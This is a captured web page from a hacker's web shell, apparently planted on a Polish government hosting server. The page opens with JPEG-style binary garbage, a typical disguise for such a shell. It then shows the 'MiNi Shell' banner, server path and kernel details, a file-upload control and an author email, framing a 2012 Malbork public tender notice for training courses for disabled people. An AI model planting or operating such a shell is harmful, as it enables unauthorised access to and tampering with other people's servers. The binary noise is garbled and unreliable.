JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120817/178831-N-2012.html

<p class="kh_header"><b>Malbork: Szkolenie/kursy  realizowane w ramach projektu systemowego pn. My też mamy prawo współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego, Poddziałanie 7.1.2 Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 178831 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , plac Słowiański 17, 82-200 Malbork, woj. pomorskie, tel. 55 647 15 45, faks 55 647 15 45.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie/kursy  realizowane w ramach projektu systemowego pn. My też mamy prawo współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego, Poddziałanie 7.1.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów/szkoleń dla osób niepełnosprawnych i wychowanków rodzin zastępczych, placówek opiekuńczo wychowawczych zagrożonych wykluczeniem społecznym, będących w wieku aktywności zawodowej (16-64 lat), korzystających ze świadczeń pomocy społecznej w rozumieniu przepisów ustawy o pomocy społecznej lub korzystających na okoliczność projektu, mieszkających na terenie powiatu malborskiego będących uczestnikami projektu systemowego My też mamy prawo , współfinansowanego przez Unie Europejską w ramach środków Europejskiego Funduszu Społecznego, Pododdziale 7.1.2 Programu Operacyjnego Kapitał Ludzki.
2.Kursy/szkolenia obejmują 8 osób w tym: 7 osób niepełnosprawnych.   
3.Na cenę składa się realizacja wymienionych szkoleń:
1. Kurs - Język szwedzki na poziomie podstawowym
Wymagany, minimalny zakres kursu:
-Kurs prowadzony przede wszystkim metodą komunikacyjną, która jest skoncentrowana na jak najszybszym swobodnym komunikowaniu się,
-Wykorzystywanie różnych sposobów stymulacji językowej, ćwiczenia bazujące na pamięci wzrokowej, ruchowej i słuchowej.
Prowadzący: Lektor/filolog posiadający doświadczenie w prowadzeniu kursu z języka szwedzkiego
Liczba godzin - 1 grupa - łącznie 60 godzin dydaktycznych
Liczba uczestników - 2 osoby niepełnosprawne (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork, dopuszcza się zorganizowanie szkolenia poza Malborkiem.
Koszty dojazdu - organizator szkolenia pokrywa koszty dojazdu i powrotu z Malborka do miejsca szkolenia.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

2. Szkolenie - Dogoterapia
Wymagany, minimalny zakres kursu
a)Historia i metodyka dogoterapii,
b)Pedagogika i psychologia rozwojowa 
-rozwój dziecka
-zaburzenia rozwojowe
-niepełnosprawność intelektualna
-autyzm
c)Pies w dogoterapii 
-wybór psa do dogoterapii 
-praca ze szczeniakiem 
-szkolenie
-behawior
-sygnały uspokajające 
-warsztaty klikerowe
-podstawy weterynarii
c)Wstęp do fizjoterapii
-fizjologia człowieka
-uszkodzenia mózgu i postępowanie terapeutyczne
-najczęstrze jednostki chorobowe.
Prowadzący: Instruktor szkolenia psów/dogoterapeuta posiadający doświadczenie w prowadzeniu szkoleń z zakresu dogoterapii
Liczba godzin - łącznie 115 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork, dopuszcza się zorganizowanie szkolenia poza Malborkiem.
Koszty dojazdu - organizator szkolenia pokrywa koszty dojazdu i powrotu z Malborka do miejsca szkolenia.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

3. Kurs - Masażu I st. o profilu rozszerzonym
Wymagany, minimalny zakres kursu

-Anatomia funkcjonalna człowieka.
-Wprowadzenie do masażu - zagadnienia teoretyczne obejmujące : 
1. Rys historyczny,
2. Techniki masażu i ich oddziaływanie,
3. Wskazania i przeciwwskazania do masażu,
4. Wpływ masażu na organizm człowieka,
5. Metodyka stosowania masażu.
-Część praktyczna I - masaż klasyczny:
1. Opracowanie kończyny górnej (ręka, przedramie, ramię), twarz, kark, kończyna dolna, obręcz kończyny dolnej, masaż odcinkowy lędźwiowo-krzyżowy LS, piersiowy Th, szyjny S, grzbiet, obręcz kończyny górnej, klatka piersiowa, brzuch,
2. Opracowanie masażu całościowego,
3. Metodyka badania pacjenta: zmiany chorobowe, wywiad z pacjentem, diagnoza stanu zdrowia.
-Część praktyczna II - profil rozszerzony:
1. Masaż sportowy,
2. Masaż izometryczny,
3. Masaż kontralateralny,
4. Masaż relaksacyjny,
5. Masaż odchudzający, modelujący.

Prowadzący: fizjoterapeuta/rehabilitant z doświadczeniem zawodowym i dydaktycznym
Liczba godzin - łącznie 120 godzin dydaktycznych
Liczba uczestników - 4 osoby - w tym 3 osoby niepełnosprawne, niewidome i słabo widzące
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork. 
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

4. Kurs Decupage
Wymagany, minimalny zakres kursu

-Technika serwetkowa
-Kurs decoupage klasyczny i cieniowania, malarski decoupage, cieniowania w decoupage,
-Decoupage na szkle, decoupage na opak, decoupage odwrotny, papier ryżowy
-Decoupage z jedno i dwuskładnikowym crackle oraz napisy
-Klasyczny print room, malowany print room
-Złocenie i postarzanie
-Tójwymiarowy decoupage, pasty strukturalne
-Patchworkowy i malowanie patchworków + szablony
-Zdobienie jajek, bombek świątecznych
-Decupage mozaikowy
-Manekin krawiecki

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu kursu decupage
Liczba godzin - łącznie 60 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork, dopuszcza się zorganizowanie szkolenia poza Malborkiem.
Koszty dojazdu - organizator szkolenia pokrywa koszty dojazdu i powrotu z Malborka do miejsca szkolenia.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.
I.Obowiązki Wykonawcy
a.Opracowanie i przedstawienie Zamawiającemu przed szkoleniem szczegółowego programu/harmonogramu szkoleń/kursów. 
b.Zapewnienie uczestnikom materiałów merytorycznych i dydaktycznych. 
c.Zapewnienie wykwalifikowanej kadry trenerskiej. 
d.Zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do liczby uczestników z urządzeniami projekcyjnymi typu: projektor, ekran projekcyjny lub tablica interaktywna, flipchart. 
e.Miejsce szkolenia/kursu dostosowane dla osób niepełnosprawnych.
f.Wykonawca zobowiązany jest do prowadzenia dokumentacji szkoleń/kursów, tj. listy obecności uczestników, dziennika zajęć, ankiet oceniających szkolenie/kurs, list potwierdzającej odbiór materiałów szkoleniowych oraz certyfikatów/zaświadczeń a także dokumentacji fotograficznej na CD z minimum 10 zdjęciami. Wykonawca przekaże Zamawiającemu kserokopię potwierdzonej za zgodność z oryginałem całości dokumentacji za daną grupę w terminie do 14 dni od jego zakończenia.
g.Wydanie zaświadczenia/certyfikatu o ukończeniu kursów/szkoleń dla uczestnika który uczęszczał przynajmniej na 80% godzin zajęć w ramach całego szkolenia/kursu.
h.Oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz nazwą projektu My też mamy prawo Powiatowego Centrum Pomocy Rodzinie w Malborku.
i.Zapewnienie bufetu kawowego ( kawa, herbata , napoje, ciastka) dla 8 uczestników projektu systemowego  My też mamy prawo podanie nazwy i adresu obiektu, w którym odbędą się kursy/szkolenia.
j.Ubezpieczenie NNW dla każdego uczestnika. W przypadku innego miejsca odbywania szkolenia/kursu niż Malbork ubezpieczenie obejmujące dojazd uczestników kursu/szkolenia z  Malborka do miejsca szkolenia/kursu  i z miejsca szkolenia/kursu  do Malborka, na kwotę nie niższą niż 10.000,00zł na jedną osobę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca załączy do oferty oświadczenie o spełnianiu warunku dotyczącego posiadania aktualnego na rok 2012 wpisu do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej, w rozumieniu art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy. Oświadczenie to zostanie uznane za złożone, jeśli wykonawca złoży ogólne oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże , że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym krótszym okresie - wykonał należycie co najmniej trzy dowolne szkolenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował salą szkoleniową na terenie miasta Malbork, która pomieści do 4 osób szkolonych jednocześnie, wyposażoną na czas szkolenia w liczbę ławek i krzeseł adekwatną do liczby osób kierowanych na szkolenie, tablicę kredową i/lub suchościeralną, i/lub flipchart z zapasem kartek, projektor oraz ekran projekcyjny (lub odpowiednio przygotowana ściana) do wyświetlania prezentacji z np. MS PowerPoint (uwaga: sala szkoleniowa musi spełniać wymagania odnośnie natężenia oświetlenia, a więc pomieszczenie w którym odbywały się będą zajęcia musi być jasne - oświetlenie powinno być naturalne wspomagane oświetleniem sztucznym, odpowiednią ilość zestawów komputerowych do przeprowadzenia zajęć. Pomieszczenie musi również spełniać wymagania odpowiednią  wentylacji i temperatury, zgodnie z przepisami prawa w zakresie BHP. Wymagania w zakresie BHP spełniały będą również ławki, jak i krzesła)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował odpowiednią liczbą osób, która  zostanie oddelegowana do pełnienia funkcji trenera na szkoleniu/kursie będącym przedmiotem niniejszego przetargu przy czym osoby te muszą posiadać odpowiednie wykształcenie, kwalifikacje i  uprawnienia do prowadzenia danego szkolenia/kursu  o tematyce określonej w  3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiat.malbork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pcpr.powiat.malbork.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Malborku, ul. Plac Słowiański 17 82-200 Malbork, pok. nr 10 (sekretariat), parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 2.	Kursy/szkolenia obejmują 8 osoby w tym: 7 osób niepełnosprawnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com